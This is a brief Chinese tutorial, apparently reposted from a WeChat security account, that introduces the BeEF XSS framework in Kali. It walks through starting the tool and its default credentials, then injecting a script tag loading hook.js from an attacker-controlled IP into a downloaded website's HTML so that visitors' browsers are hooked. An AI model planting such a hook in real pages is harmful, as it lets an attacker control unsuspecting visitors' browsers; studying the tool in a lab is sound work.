今天我们稍微讲一下BeEF的使用,BeEF是一个XSS平台
BeEF
这个工具在Kali已经预装了,我们直接点击就可以打开了
就是这个<牛>
点开之后会跳出一个Terminal来,在Terminal里面有我们很需要的东西
比如我们的Web平台的地址(启动时候就会自动打开)
还有一些进行XSS攻击时候会用到的脚本例子
这个东西就是我们进行XSS攻击的时候要提交的东西~
这里把IP改一下可以了
(这里注意,如果你用的是Kali虚拟机,记得用桥接模式)
当然,这里不一定非要提交这个字符串,我们可以根据实际情况更改一些标签等等
这里简单演示一下,在一个网页里面加入这个script之后
BeEF可以干什么
我们这里随便下载个网站的源码(比如初音社的)
然后编辑这个加入我们的script
<script src="http://192.168.43.204:3000/hook.js"></script>
这样
之后我们在Kali里面打开BeEF的Web界面
默认密码是beef:beef
之后
我们就可以用浏览器打开我们下载的离线HTML了
马上BeEF中就可以看到如下的显示
就可以看到我们的浏览器在线
如果是正在攻击一个IP,你将会在BeEF上看到这些
好了,我们就大概演示BeEF的功能和用途到这里,大家可以熟悉熟悉这个工具的使用,明天我们讲XSS会用到
本文完
原文始发于微信公众号(玄魂工作室):Hacker基础之工具篇 BeEF
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论